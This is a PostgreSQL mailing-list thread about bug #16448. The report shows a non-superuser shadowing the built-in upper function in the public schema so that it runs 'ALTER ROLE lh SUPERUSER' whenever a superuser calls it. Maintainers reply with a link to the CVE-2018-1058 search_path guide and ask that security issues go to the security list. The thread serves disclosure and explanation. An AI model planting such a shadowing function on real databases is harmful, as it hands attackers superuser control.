BUG #16448: Remote code execution vulnerability

On 18/05/2020 12:14, PG Bug reporting form wrote:

The following bug has been logged on the website:

Bug reference: 16448
Logged by: yi Ding
Email address: abcxiaod@126.com
PostgreSQL version: 10.12
Operating system: linux
Description:

A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.

First, Non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;

Second, Superuser pg01 will execute the above statement after calling the
upper function, whice will change user lh to a super user.

See
https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path

- Heikki

On Mon, May 18, 2020 at 2:41 AM PG Bug reporting form <
noreply@postgresql.org> wrote:

The following bug has been logged on the website:

Bug reference: 16448
Logged by: yi Ding
Email address: abcxiaod@126.com
PostgreSQL version: 10.12
Operating system: linux
Description:

A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights
call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.

The project respectfully requests that security related concerns be
reported to the security list as opposed to the public bug report listing.

https://www.postgresql.org/support/

security@postgresql.org

David J.